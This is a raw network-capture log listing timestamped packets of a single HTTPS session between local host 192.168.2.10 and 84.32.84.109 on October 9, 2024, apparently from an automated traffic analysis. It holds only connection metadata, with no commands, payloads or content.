Oct 9, 2024 16:16:04.967118025 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.967123985 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.967135906 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.967169046 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.967176914 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.967185974 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.967216015 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.967231989 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.967233896 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.967242956 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.967279911 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.967286110 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.967317104 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.967319012 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.967329025 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.967356920 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.967365026 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.967395067 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.967402935 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.967416048 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.967447996 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.967468023 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.967475891 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.967485905 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.967492104 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.967505932 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.967509985 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.967530966 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.968039989 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.968081951 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.968085051 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.968096972 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.968117952 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.968121052 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.968159914 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.968175888 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.968183041 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.968200922 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.968200922 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.968235970 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.968242884 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.968252897 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.968275070 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.968281031 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.968291044 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.968297958 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.968326092 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.968326092 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.968336105 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.968375921 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.968389988 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.968396902 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.968413115 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.968667984 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.969038010 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.969088078 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.969100952 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.969116926 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.969137907 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.969141960 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.969155073 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.969161034 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.969194889 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.969209909 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.969216108 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.969224930 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.969228983 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.969255924 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.969264984 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.969270945 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.969286919 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.969291925 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.969320059 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.969337940 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.969343901 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.969360113 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.969960928 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.970001936 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.970005035 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.970015049 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.970038891 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.970046997 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.970056057 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.970073938 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.970079899 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.970091105 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.970104933 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.970128059 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.970138073 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.970144033 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.970163107 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.970169067 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.970199108 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.970202923 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.970211983 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.970232010 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.970248938 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.970269918 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.970287085 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.970293045 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.970309019 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.970916986 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.970963955 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.970969915 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.970976114 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.970989943 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.970994949 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.971030951 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.971031904 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.971043110 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.971077919 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.971095085 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.971101999 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.971117020 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.971349001 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.971415043 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.971452951 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.971458912 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.971467972 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.971510887 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.971525908 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.971534014 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.971556902 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.971579075 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.971601009 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.971617937 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.971623898 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.971633911 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.971637964 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.971666098 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.971676111 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.971683025 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.971699953 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.971705914 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.971741915 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.971760035 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.971766949 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.971781969 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.971781969 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.971821070 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.971827030 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.971859932 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.972275019 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.972306013 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.972321987 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.972326994 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.972343922 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.972388983 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.972408056 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.972418070 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.972429991 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.972450018 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.972461939 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.972480059 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.972485065 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.972501040 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.972676039 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.972704887 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.972712040 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.972718000 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.972733974 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.972806931 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.972846985 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.972852945 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.972862959 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.972889900 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.972907066 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.972913980 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.972923994 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.972930908 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.972944021 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.972949028 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.972966909 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.973006010 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.973012924 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.973027945 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.973031998 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.973038912 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.973050117 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.973062992 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.973081112 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.973087072 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.973099947 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.973102093 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.973136902 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.973143101 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.973155022 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.973201990 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.973201990 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.973208904 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.973381996 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.973715067 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.973747015 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.973762035 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.973767042 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.973783970 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.973850012 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.973886013 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.973886967 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.973897934 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.973937988 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.973948002 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.973953962 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.973972082 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.973980904 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.973984003 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.973990917 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.974029064 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.974046946 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.974054098 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.974069118 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.974071026 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.974087000 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.974092007 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.974108934 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.974112034 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.974154949 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.974159956 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.974193096 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.978013992 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.983563900 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.983628988 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.983661890 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.983671904 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.983689070 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.983725071 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.983741999 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.983763933 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.983779907 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.983850002 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.018827915 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.018892050 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.018928051 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.018963099 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.019016981 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.019037008 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.019072056 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.019195080 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.019305944 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.019360065 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.019474030 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.019527912 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.020243883 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.020307064 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.020332098 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.020381927 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.020399094 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.020452976 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.020467043 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.020508051 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.020627022 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.020664930 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.020683050 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.020693064 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.020705938 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.020711899 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.020725965 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.020730019 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.020754099 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.020818949 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.020859003 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.020865917 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.020900965 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.021100044 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.021147966 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.021157026 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.021169901 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.021208048 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.021213055 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.021213055 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.021220922 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.021243095 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.021629095 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.021895885 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.021960020 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.021989107 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.022043943 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.022154093 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.022207022 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.022213936 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.022258997 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.022279024 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.022325039 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.022389889 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.022439003 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.048384905 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.048449039 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.048482895 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.048511982 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.048532963 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.048532963 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.048549891 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.048568010 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.048605919 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.071180105 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.071258068 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.071285009 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.071336031 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.071353912 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.071358919 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.071393967 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.071403027 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.071471930 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.071479082 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.071515083 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.106719971 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.106781006 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.106837988 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.106854916 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.106869936 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.106887102 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.106899977 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.106904984 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.106916904 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.106926918 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.106970072 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.106976032 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.107018948 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.107637882 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.107691050 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.107702971 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.107839108 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.112179041 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.112234116 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.112236977 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.112251043 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.112282991 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.112294912 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.112961054 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.113010883 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.113178015 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:05.113228083 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:05.113339901 CEST	443	49723	84.32.84.109	192.168.2.10
